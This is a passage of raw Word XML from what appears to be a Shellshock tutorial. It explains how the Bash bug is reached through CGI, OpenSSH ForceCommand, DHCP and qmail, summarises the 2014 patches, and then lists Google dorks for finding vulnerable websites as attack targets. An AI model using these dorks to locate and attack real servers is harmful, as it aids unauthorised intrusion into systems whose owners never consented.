      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Common Gateway Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> (CGI) to handle a document request, it passes various details of the request to a handler program in the environment variable list. For example, the variable </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>HTTP_USER_AGENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a value that, in normal usage, identifies the program sending the request. If the request handler is a Bash script, or if it executes one for example using the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3) call, Bash will receive the environment variables passed by the server and will process them as described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted server request. Security documentation for the widely used Apache web server states: “CGI scripts can … be extremely dangerous if they are not carefully checked.” and other methods of handling web server requests are often used. There are a number of online services which attempt to test the vulnerability against web servers exposed to the Internet.</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>OpenSSH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OpenSSH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ForceCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” feature, where a fixed command is executed when the user logs in, instead of just running an unrestricted command shell. The fixed command is executed even if the user specified that another command should be run; in that case the original command is put into the environment variable </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>“SSH_ORIGINAL_COMMAND”</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. When the forced command is run in a Bash shell (if the user’s shell is set to Bash), the Bash shell will parse the SSH_ORIGINAL_COMMAND environment variable on start-up, and run the commands embedded in it. The user has used their restricted shell access to gain unrestricted shell access, using the Shellshock bug.</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DHCP Clients</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Some </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> clients can also pass commands to Bash; a vulnerable system could be attacked when connecting to an open Wi-Fi network. A DHCP client typically requests and gets an IP address from a DHCP server, but it can also be provided a series of additional options. A malicious DHCP server could provide, in one of these options, a string crafted to execute code on a vulnerable workstation or laptop.</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Qmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server</w:t>
      </w:r>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 xml:space="preserve">When using Bash to process email messages (e.g. through .forward or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-alias piping), the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mail server passes external input through in a way that can exploit a vulnerable version of Bash.</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How Do Mitigate this Vulnerability?</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Until 24 September 2014, Bash maintainer Chet Ramey provided a patch version </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>bash43-025</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> of Bash 4.3 addressing </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>CVE-2014-6271</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, which was already packaged by distribution maintainers. On 24 September, bash43-026 followed, addressing </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>CVE-2014-7169</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Then </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>CVE-2014-7186</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> was discovered. Florian Weimer from Red Hat posted some patch code for this “unofficially” on 25 September, which Ramey incorporated into Bash as bash43-027. These patches provided code only, helpful only for those who know how to compile (“rebuild”) a new Bash binary executable file from the patch file and remaining source code files.</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The next day, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Red Hat</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> officially presented according updates for Red Hat Enterprise Linux, after another day for </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Fedora 21</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Canonical Ltd. presented updates for its </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu Long Term </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>versions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Saturday, 27 September; on Sunday, there were updates for </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>SUSE Linux Enterprise</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. He following Monday and Tuesday at the end of the month, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Apple OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> X updates appeared.</w:t>
      </w:r>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 xml:space="preserve">On 1 October 2014, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Zalewski</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Google Inc. finally stated that Weimer’s code and bash43-027 had fixed not only the first three bugs but even the remaining three that were published after bash43-027, including his own two </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>discoveries.This</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> means that after the earlier distribution updates, no other updates have been required to cover all the six issues.</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Source:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>github.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>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pict>
          <v:rect id="_x0000_i1025" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:spacing w:after="255" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>FIND POTENTIAL TARGETS</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There is no doubt that there are thousand and one ways to find vulnerable targets for this type of attack. In order to cut short, we are going to use a non-exhaustive list of Google Dork to build a list of potential vulnerable websites.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6"/>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sitemap.xml </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>filetype:xml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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intext</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-bin"</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filetype:sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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inurl:cgi-bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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5"/>
      </w:tblGrid>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filetype:sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>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intext:cgi-bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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intitle:apache</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-bin"</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inurl:cgi-bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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inurl:wspd_cgi.sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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inurl:wslb.sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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6"/>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inurl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:"server-status"</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>intitle:apache</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-bin"</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inurl:cgi-bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> "GATEWAY_INTERFACE = CGI"</w:t>
            </w:r>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1"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidTr="00AA737B">
        <w:trPr>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inurl:cgi-bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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inurl:printenv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>intext:SERVER_ADDR</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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Note</w:t>
      </w:r>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An additional list of dork can be found in the enclosed PDF file.</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Optional</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To save time finding potential vulnerable targets, we highly suggest you to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
